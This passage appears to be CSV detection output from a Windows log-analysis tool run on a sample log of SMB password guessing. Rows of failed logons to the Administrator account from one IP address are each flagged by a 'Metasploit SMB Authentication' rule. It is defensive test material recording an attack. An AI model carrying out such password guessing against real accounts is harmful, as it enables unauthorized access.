SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmVAnxq39t7qbcEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13y2nnltjipwZqth : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDQrPBL1VodIcQLR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: K0Mp4jXeHd3b0CLw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3j89GmIDnG4v7JJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyRLZMoaXJUrPPfn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcoyOKUjEi1uCSpD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWQGVJLcVwgf4YJ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrFqG85mmjTYJ4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DqIh1QHTk470nrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feVbA94p6iT2pBeC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T30YHcE8ZG7FaxW7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaKHRwYtx2lGtOCG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: zDEDuMmlDZZfdkFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CObqGJQi1hOOI83J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhsE9bQeEwW21bAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: El1qxgjvGS0QSS4Y : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vtlr3HwzJcAfSxuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDayr44iXmE63vqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkNoLVOhnS8ayujK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3ggg78jjziKqijrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BodeSVqeqa5qBQDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yY7yxEcuGwWSJZV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: oTlg6cvsz6Z6QpCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3pTALzqu4Ok6CUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdGagQIEcvQQMp4n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVu4reOyQEIkChHO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EJWNS69MmMGLSnHc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPaR2sBxPPCjxpL0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kJJ9A1EfqM4V2TRv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dxf59xjpxO3oG17 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dMI12g4tjSF8PX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZAqN0xPaW4jg2Kjc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: mcnReyIEaqsQfowV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: akOH8Y7XdjOpqTez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b0HOK1TIqloud7gh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n6uIAK55BmTnA6Bf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDnn6QmLOJ6KwzKt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np8KaRJvRqBrGyFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dxbu69Amr6gWN5Hw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoZdaFJWNON8Ujnc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q4RSlXgOS7sssCqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2PJprE7olK4pjrx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jQOAUcWQL32y2gGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXI0wWwzhHN0uvOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujGqTzfOhmKgoAjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cFoPtWZ03O3ZZgOC : IP Address: 192.168.198.149 : AuthPackage: 
